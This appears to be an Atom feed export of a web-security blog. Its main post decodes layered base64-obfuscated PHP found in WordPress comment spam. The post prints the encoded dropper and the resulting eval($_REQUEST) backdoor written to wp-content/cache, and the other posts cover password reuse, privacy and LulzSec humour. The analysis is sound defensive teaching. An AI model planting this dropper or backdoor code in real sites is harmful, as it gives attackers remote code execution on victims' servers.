tag:blogger.com,1999:blog-82810354613297146562023-11-16T06:26:11.392-05:00Web InsecurityJavaScript joys and other perils of the modern webTerri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.comBlogger57125tag:blogger.com,1999:blog-8281035461329714656.post-90728958004713570842013-05-06T16:24:00.002-04:002013-05-07T12:39:38.869-04:00Falling down the rabbit hole: An analysis of some questionable blog spam<strong>WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.</strong>
<br />
<br />
So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dw<wbr></wbr>LWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cn<wbr></wbr>KSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2<wbr></wbr>YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9k<wbr></wbr>ZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1ky<wbr></wbr>QTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZV<wbr></wbr>Y25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5<wbr></wbr>cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0<wbr></wbr>S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5<wbr></wbr>b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQ<wbr></wbr>U3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBj<wbr></wbr>NlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVU<wbr></wbr>VDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4<wbr></wbr>cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZL<wbr></wbr>aXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4q<wbr></wbr>L1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBL<wbr></wbr>aTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlw<wbr></wbr>UFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFN<wbr></wbr>azU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNS<wbr></wbr>eWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35x<wbr></wbr>cyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpG<wbr></wbr>OVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0<wbr></wbr>TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtp<wbr></wbr>OG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQ<wbr></wbr>ZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8q<wbr></wbr>disoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThu<wbr></wbr>ZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0sy<wbr></wbr>WXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZ<wbr></wbr>UENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6<wbr></wbr>dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0Nw<wbr></wbr>QFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8v<wbr></wbr>KlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNs<wbr></wbr>b3NlKCRmKTt9′));</span><br />
<br />
Or this clearly related one (note that the top of the string is the same):<br />
<code><br /><span style="font-family: Courier New, Courier, monospace;">aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUv<wbr></wbr>aWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/c<wbr></wbr>GhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvK<wbr></wbr>i1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qL<wbr></wbr>ygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9EN<wbr></wbr>UpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2W<wbr></wbr>TNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDO<wbr></wbr>HFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd<wbr></wbr>0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxT<wbr></wbr>Hk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db<wbr></wbr>3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14U<wbr></wbr>kNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5c<wbr></wbr>FRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBd<wbr></wbr>FFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLU<wbr></wbr>zhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4a<wbr></wbr>EtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJS<wbr></wbr>GxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ<wbr></wbr>2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa<wbr></wbr>3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0Y<wbr></wbr>VF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ<wbr></wbr>3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjV<wbr></wbr>z4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLU<wbr></wbr>VNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEO<wbr></wbr>W9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS<wbr></wbr>2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmK<wbr></wbr>i8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZUR<wbr></wbr>m9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL<wbr></wbr>01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMe<wbr></wbr>ThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvK<wbr></wbr>iAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qU<wbr></wbr>yw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/P<wbr></wbr>icpO2ZjbG9zZSgkZik7fQ==</span></code><br />
<br />
As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).
<br />
<br />
Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:<br />
<code><br /></code>
<span style="font-family: Courier New, Courier, monospace;">>>> import base64</span><br />
<span style="font-family: Courier New, Courier, monospace;">>>> base64.b64decode(badstring1)</span><br />
<span style="font-family: Courier New, Courier, monospace;">"if($f=fopen('wp-content/cache/ifooag.php','w'))</span><br />
<span style="font-family: Courier New, Courier, monospace;">{fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/</span><br />
<span style="font-family: Courier New, Courier, monospace;">\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc</span><br />
<span style="font-family: Courier New, Courier, monospace;">3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qc</span><br />
<span style="font-family: Courier New, Courier, monospace;">iB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM52</span><br />
<span style="font-family: Courier New, Courier, monospace;">0*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6</span><br />
<span style="font-family: Courier New, Courier, monospace;">QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdn</span><br />
<span style="font-family: Courier New, Courier, monospace;">MXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCov</span><br />
<span style="font-family: Courier New, Courier, monospace;">J2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTD</span><br />
<span style="font-family: Courier New, Courier, monospace;">QqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2</span><br />
<span style="font-family: Courier New, Courier, monospace;">sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV</span><br />
<span style="font-family: Courier New, Courier, monospace;">1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo</span><br />
<span style="font-family: Courier New, Courier, monospace;">8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1s</span><br />
<span style="font-family: Courier New, Courier, monospace;">vKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMyg</span><br />
<span style="font-family: Courier New, Courier, monospace;">yMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vK</span><br />
<span style="font-family: Courier New, Courier, monospace;">k4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qO</span><br />
<span style="font-family: Courier New, Courier, monospace;">lo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``></span><br />
<span style="font-family: Courier New, Courier, monospace;">{*/;/*-|lTE1*/?>');fclose($f);}"</span><br />
<br />
<br />
(Well, okay, I actually ran <code>cgi.escape(base64.b64decode(badstring1))</code> to get the version you're seeing in the blog post since I wanted to make sure none of that was executed, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)
<br />
<br />
So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.
<br />
<br />
But that code? Still looks pretty much like gobbledegook.
<br />
<br />
If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKn<wbr></wbr>chblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OX<wbr></wbr>xAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki<wbr></wbr>9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'q<wbr></wbr>PSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8n<wbr></wbr>bCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdn<wbr></wbr>MXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4v<wbr></wbr>Kix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha<wbr></wbr>00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqL<wbr></wbr>ykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc<wbr></wbr>0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SG<wbr></wbr>czKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIH<wbr></wbr>sqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi<wbr></wbr>8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLy<wbr></wbr>pZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8<wbr></wbr>qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8<wbr></wbr>qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJ<wbr></wbr>XZztASyovOy8qRTsrdidJKi8=\\'));</span><br />
<br />
Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:<br />
<br />
<code><br /><span style="font-family: Courier New, Courier, monospace;">Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBR<wbr></wbr>Ki9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRf<wbr></wbr>UkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/Q<wbr></wbr>GV0WyovLi8qPSwpKi8neicvKnVUQTkzKi8uLypDe<wbr></wbr>0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqL<wbr></wbr>yd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZ<wbr></wbr>XxqeUEqLy4vKix2KCovJ2wnLypGLVFvTDQqL10vK<wbr></wbr>mJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX<wbr></wbr>2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oL<wbr></wbr>ypVc0htWV1lWiovc3RyaXBzbGFzaGVzLyo8SGczK<wbr></wbr>i8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL<wbr></wbr>1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8ne<wbr></wbr>icvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZW<wbr></wbr>VAzenUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL<wbr></wbr>10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vK<wbr></wbr>mJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovO<wbr></wbr>y8qRTsrdidJKi8=</span></code><br />
<br />
You might think we're getting close now, but here's what you get out of decoding that:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">>>> base64.b64decode(badstring1a)</span><br />
<code><span style="font-family: Courier New, Courier, monospace;">"/*wc`;p*/if/*w!n[*/(/*^s[!TrpQ*/isset/*P<wbr></wbr>H49|@*/(/*x`jV)N*/$_REQUEST/*r x*/[/*(~Qq*/'c'/*1?@et[*/./*=,)*/'z'/*uT<wbr></wbr>A93*/./*C{G:@4\\*/'l'/*8t o*/./*myM=<d pig4="" wbr="" xgg1v61="" y="" z="">/*e|jyA*/./*,v(*/'l'/*F-QoL4*/]/*bakM)*/<wbr></wbr>/*\\;sn*/)/*NwKI'_*//*O_k*/)/*H@aK4T*/ev<wbr></wbr>al/*2N|20>*/(/*UsHmY]eZ*/stripslashes/*<h wbr="">g3*/(/*UAKaf*/$_REQUEST/*V.KT {*/[/*K-.c*/'c'/*Hoh*/./*XN;G*/'z'/*;&3(2<wbr></wbr>1d&]*/./*;POu*/'l'/*YYP3zu*/./*UliU-*/'z<wbr></wbr>yl'/*FTY\\4*/]/*N?Rb>+f*//*K+KC*/)/*l@j*<wbr></wbr>//*bX<*/)/*:Z6UE(JB8*//*BWg;@K*/;/*E;+v'I*<wbr></wbr>/"</h></d></span></code><br />
<br />
Yup, definitely going in circles. But at least we know what to do: get rid of the comments again.
<br />
<br />
<br />
Incidentally, I'm just using a simple regular expression to do this: <code><span style="font-family: Courier New, Courier, monospace;">s/\/\*[^*]*\*\///g</span></code>. That's not robust against all possible nestings or whatnot, but it's good enough for simple analysis. I actually execute it in vim as <code><span style="font-family: Courier New, Courier, monospace;">:%s/\/\*[^*]*\*\///gc</span></code> and then check each piece as I'm removing it.<br />
<br />
<br />
Here's what it looks like without the comments:<br />
<code><span style="font-family: Courier New, Courier, monospace;"><br /></span></code>
<code><span style="font-family: Courier New, Courier, monospace;">if(isset($_REQUEST['c'.'z'.'l'.'z'.'y'.'l'<wbr></wbr>]))eval(stripslashes($_REQUEST['c'.'z'.'l'<wbr></wbr>.'zyl']));</span></code><br />
<code><br /></code>
<code><br /></code>
So let's stick together those concatenated strings again:
<code><span style="font-family: Courier New, Courier, monospace;">
</span></code><br />
<br />
<code><span style="font-family: Courier New, Courier, monospace;">if(isset($_REQUEST['czlzyl']))eval(strip<wbr></wbr>slashes($_REQUEST['czlzyl']));</span></code><br />
<br />
Okay, so now it's added some piece into some sort of wordpress file that is basically just waiting for some outside entity to provide code which will then be executed. That's actually pretty interesting: it's not fully executing the malicious payload now; it's waiting for an outside request. Is this to foil scanners that are wise to the type of things spammers add to blogs, or is this in preparation for a big attack that could be launched all at once once the machines are prepared?<br />
<br />
It's going to go to be a request that starts like this<br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">http://EXAMPLE.COM/wp-content/cache/ifooag.php?czlzyl=
</span><br />
<br />
Unfortunately, I don't have access to the logs for the particular site I saw this on, so my analysis stops here and I can't tell you exactly what it was going to try to execute, but I think it's pretty safe to say that it wouldn't have been good. I <em>can</em> tell you that there is no such file on the server in question and, indeed, the code doesn't seem to have been executed since it got caught in the spam queue and discarded by me.
<br />
<br />
But if you've ever had a site compromised and wondered how it might have been done, now you know a whole lot more about the way it could have happened. All I can really suggest is that spam blocking is important (these comments were caught by akismet) and that if you can turn off javascript while you're moderating comments, that might be the safest possible thing to do even though it makes using wordpress a little more kludgy and annoying. Thankfully it doesn't render it unusable!
<br />
<br />
Meanwhile, want to try your own hand at analyzing code? I only went through the full decoding for the first of the two strings I gave at the top of this post, but I imagine the second one is very similar to the first, so I leave it as an exercise to the reader. Happy hacking!Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-8171661638178316702012-07-12T13:46:00.001-04:002012-07-12T15:03:59.475-04:00Should you really change your re-used passwords after a breach? Maybe not.<a href="http://www.flickr.com/photos/mrzeon/5330056727/" title="Dice by Daniel Dionne, on Flickr"><img align="right" alt="Dice" height="160" src="https://farm6.staticflickr.com/5206/5330056727_a98c97c3c5_m.jpg" style="padding: 10px;" width="240" /></a>The news is reporting that <a href="http://arstechnica.com/security/2012/07/yahoo-service-hacked/">453,000 credentials were allegedly taken from Yahoo</a>, and current reports say that it's probably Yahoo Voice that was compromised. If you want to know if yours is in there, it seems like the hacker website is overwhelmed at the moment, but you can <a href="http://dazzlepod.com/yahoo/">search for your username/email</a> here on a sanitized list that doesn't include the passwords.
<br />
<br />
Probably unsurprisingly, the next bit of news is that people haven't changed their hacked passwords from previous breaches. To whit, <a href="http://www.troyhunt.com/2012/07/what-do-sony-and-yahoo-have-in-common.html">59% of people were re-using the passwords that had previously been hacked and released to the public in the Sony breach</a>. Which seems a bit high given the publicity, but I'm not as surprised as I maybe should be.<br />
<br />
<b>What I'd really like to know is how many of those people actually suffered from this password re-use.</b> Did anyone bother to try re-using their credentials?<br />
<br />
I'm reminded of one of my favourite security papers, "<a href="http://research.microsoft.com/users/cormac/papers/2009/SoLongAndNoThanks.pdf">So Long, and No Thanks for the Externalities: the Rational Rejection of Security Advice by Users</a>," by Cormac Herley. In it, he claims that many security "best" practices like changing passwords frequently are actually a waste of time for the average user, when you take into account the risks involved. <br />
<br />
So, is changing a password after a breach one of those things that we can skip without much incident? Sadly, I don't have any definitive way to analyze how many folk were inconvenienced by their password reuse in the Sony and subsequent Yahoo breaches, but I can make a guess: If those accounts were compromised on Yahoo after the Sony breach, we'd be seeing a lot more people changing their passwords between the two. So probably at least those 59% were not inconvenienced enough to change their passwords subsequent to the breach. That's a lot of people.<br />
<br />
Of course, it's possible that the accounts were breached and used in a way that the owner never noticed. But if they're not noticing, are they really being inconvenienced? Probably in a global sense (i.e. spam) but maybe not in a short-term decision-making sense. Of course, we could assume that the alleged hack is a hoax using many of the previously hacked passwords from Sony, but given how easy it is to compromise web apps I'm currently assuming that the hack itself is a real thing. In which case, that's a lot of no-change. It looks suspiciously like you're likely to be more inconvenienced taking the time to change your password than you would if you did nothing, statistically speaking.<br />
<b><br /></b><br />
<b>So, should you change your password after a breach? It depends on how much you feel like rolling the dice.</b> Failing to change their breached passwords doesn't seem to have hurt that many of the Yahoo Voice denizens, but with numbers on re-used passwords hitting the news today, it's possible we'll see more people trying this avenue of attack in the future. Still, rather than assuming those 59% are foolish for keeping the same credentials, it's worth considering that they might have just been savvy gamblers, this time.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-58304494765266343652012-03-28T14:12:00.000-04:002012-03-28T14:12:44.263-04:00Apparently consumers do care about privacyI often get into discussions about whether people really do care about privacy, given that they give away personal information regularly when they share with friends via Facebook or other services. A recent report suggests that people <em>do</em> care, at least when it comes to banking and shopping:<br />
<br />
<blockquote>The <a href="http://datasecurity.edelman.com/wp-content/uploads/2012/03/Data-Security-Privacy-Executive-Summary.pdf">Edelman study</a> released in February 2012 shows that consumer concerns about data privacy and security are actively diminishing their trust in organizations. For instance, 92% listed data security and privacy as important considerations for financial institutions, but only 69% actually trusted financial institutions to adequately protect their personal information. An even sharper disconnect can be seen with online retailers, with 84% naming security of personal information as a priority but only 33% trusting online retailers to protect it.</blockquote><br />
The blog of the Office of the Canadian Privacy Commissioner (from which I drew this quote) sums it up in the title: <a href="http://blog.privcom.gc.ca/index.php/2012/03/27/privacy-not-just-good-business-but-good-for-business/">Privacy: Not just good business, but good for business</a>.<br />
<br />
But I have to wonder, do these numbers indicate that privacy-preserving businesses will be winning customers, or will we simply see <em>claims</em> of privacy that aren't backed up by carefully constructed systems? Do consumers really care about privacy or do they just say they care? How will consumers evaluate potentially spurious privacy claims? In Canada we at least have the privacy commissioner who brings issues to light, and worldwide we have the <a href="https://www.eff.org/">Electronic Frontier Foundation</a>, but while both organizations are astute and do their best, privacy claims are something that will need to be evaluated by organizations like Consumer Reports that are used by consumers when making decisions about where they spend and keep their money. Right now, by and large, we only hear about the relative privacy of an organization when a breach occurs.<br />
<br />
I attended a talk on Internet voting yesterday and the speaker quoted an official in DC who claimed that, "voters like internet voting, so it must be secure," which is really quite a terrifying quote if you think about it. The speaker joked, "does this mean that because my kid likes cake, it must be healthy?" It really clearly demonstrates first that users of the system have very little understanding of its safety (despite strides in the area, internet voting as currently implemented is rarely secure) but also that officials who roll out such systems have little understanding of the flaws of the system and are much too willing to overlook them for convenience sake. If this is the case with voting, it's hard to believe that business would avoid such cognitive mistakes.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com1tag:blogger.com,1999:blog-8281035461329714656.post-17545370785367332322012-02-07T15:30:00.001-05:002012-02-07T15:31:24.401-05:00Andrew Tanenbaum on Security vs Fun-Loving Students<blockquote>... "some modicum of security was required to prevent fun-loving students from spoofing routers by sending them false routing information."<br />
</blockquote><br />
- Andrew S. Tanenbaum regarding OSPF in <em>Computer Networks (4th ed.)</em>Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-70660105891042568252011-09-26T18:32:00.000-04:002011-09-26T18:32:11.132-04:00On the Subject of Privacy and Pants...I was proofreading a privacy paper this afternoon and came across the funniest typo. I feel it is funnier if I illustrate it so that you too can see what popped into my head when I read it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRXzY8hP4fRpM0brxQgJi_pefxIdVhyzOTWap8dvt3iUepVShcameZMMmZTnJ_-Py0Npeta1g4-k_8qhaQA8QNOLVTDmUzm_vMfvRNJPPW5r9Ncd3niUU370DFGFS-HKZFC4vqCiKKma4/s1600/privacybreeches.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="292" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRXzY8hP4fRpM0brxQgJi_pefxIdVhyzOTWap8dvt3iUepVShcameZMMmZTnJ_-Py0Npeta1g4-k_8qhaQA8QNOLVTDmUzm_vMfvRNJPPW5r9Ncd3niUU370DFGFS-HKZFC4vqCiKKma4/s400/privacybreeches.jpg" /></a></div><br />
(<a href="http://www.flickr.com/photos/cnewtoncom/467778980/">Photo by cnewtoncom</a>. For geek points, guess whose famous pants those are without clicking the link!)<br />
<br />
Privacy breeches are much funnier than privacy breaches. <br />
<br />
I'm not going to be able to get dressed tomorrow without laughing at my privacy-preserving pants. One could argue, perhaps, that the function of many pants is to provide basic privacy... but I leave the finding of non privacy-preserving pants as an exercise to the reader. And though it is a bit tempting to run a contest for the best illustration of a privacy breech breach, I imagine it would get not safe for work very quickly!Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-6706933778264771832011-06-24T02:52:00.002-04:002011-06-24T06:10:06.140-04:00I admit, I laughed: LulzSec as popular as orgasms?<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAOVFYnjuWB0rHQH_R9gBmPSVzOxUeETMjuNZ5Fr8CAVIS4hgOSDvnU8klcY28nT0RJl2bPclBrVUzxfDKmxwyPHhmglgiTdN1rKl2wRfWPFFnGotH0NeFiChFoZZjZ-lVd1lNvIXeTA/s1600/somehwat-mad-completely-mad-u-mad-MADAD_reasonably_small.jpg" imageanchor="1" style="clear:right; float:right; margin-left:1em; margin-bottom:1em"><img border="0" height="128" width="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAOVFYnjuWB0rHQH_R9gBmPSVzOxUeETMjuNZ5Fr8CAVIS4hgOSDvnU8klcY28nT0RJl2bPclBrVUzxfDKmxwyPHhmglgiTdN1rKl2wRfWPFFnGotH0NeFiChFoZZjZ-lVd1lNvIXeTA/s400/somehwat-mad-completely-mad-u-mad-MADAD_reasonably_small.jpg" /></a></div>Unless you've been ignoring the news for the past few weeks, you've probably seen mention of <a href="https://twitter.com/lulzsec">LulzSec</a>, and if you're a security person you've probably seen this article about <a href="http://risky.biz/lulzsec">Why [security folk] secretly love LulzSec</a>. The short version is that they're the latest hacker gang, and rather than profit or social justice, they're just in it <a href="http://www.urbandictionary.com/define.php?term=lulz">for the lulz</a>. They're really making the state of computer security more obvious to the layperson:<br />
<br />
<blockquote>LulzSec is running around pummelling some of the world's most powerful organisations into the ground... for laughs! For lulz! For shits and giggles! Surely that tells you what you need to know about computer security: there isn't any.</blockquote><br />
While I often joke that web security is an oxymoron, they demonstrate it in the funniest ways they can find. As a web security researcher, I have to admit that their antics often make me laugh... and kinda make me wish I was allowed to use stolen data for research -- all those passwords! Data was always hard to come by when I did my spam immune system work so that much just makes me salivate a little, even if I'm pretty sure our ethics committee wouldn't let me touch it. And it's not like I do authentication research. But still! Data! <a href="http://www.skullsecurity.org/blog/2011/ethics-of-password-crackingdissemination">I hope someone's doing cool things with it</a>.<br />
<br />
But here's a bit of meta-lulz: <a href="http://nakedsecurity.sophos.com/2011/06/21/lulzsec-scam-facebook/">LulzSec scam discovered on Facebook - but it's not what you think</a>. The excellent Graham Cluley discovers a Facebook scam that purports to have a picture of a LulzSec suspect, and then he sleuths out that the pixelated bait picture is, in fact, of another hacker arrested in 2008. <br />
<br />
This means that LulzSec is apparently now so newsworthy that potential pictures of them can be used as bait for Facebook scams. They're up there with <a href="http://nakedsecurity.sophos.com/2011/06/17/the-president-is-finally-taking-charge-no-a-facebook-phishing-attack/">Obama</a>, <a href="http://nakedsecurity.sophos.com/2011/06/01/rihanna-hayden-panettiere-lesbian-sex-video-mac-malware-facebook/">celebrity sex tapes</a> and the ever-popular <a href="http://nakedsecurity.sophos.com/2011/05/16/facebook-dislike-button-spreads-fast-but-is-a-fake-watch-out/">dislike button</a>. <br />
<br />
I don't know about you, but I got a great chuckle out of the thought that LulzSec might be as popular as <a href="http://nakedsecurity.sophos.com/2011/06/18/amazing-orgasm-facebook-scam/">orgasms</a>... at least when it comes to scam bait. <br />
<br />
And to end with more lulz, here's my favourite LulzSec tweet of today, which came in the midst of explaining what they had and hadn't actually hacked as the media attributes everything and anything to them:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://twitter.com/#!/LulzSec/status/84019077894516737" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="107" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitX5YxnAX985vHJCBYhsPbpRUus-8bImLP0qFSE3Yzzei_hNZMPUpfm2MKZJH4R66hxU4yFiN-CjcGNHVcJqCu_VUOsDOGLt_bFNDrKbgNJjr4IxiZB4RxEBCbjfzFYITJxNCYl0Ot7q8/s400/lulz-sun.png" alt="@LulzSec: Though we did attack the actual sun... that bitch was down all last night." title="@LulzSec: Though we did attack the actual sun... that bitch was down all last night."
/></a></div>Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-49312791926470464132011-04-07T10:28:00.003-04:002011-04-07T10:32:48.190-04:00News: Experts recommend stronger protections for "Geodata"Interesting article: <a href="http://www.sciencedaily.com/releases/2011/04/110404084801.htm">Personal 'Geo Data' as Sensitive as Private Genetic Information, Experts Argue</a><br />
<br />
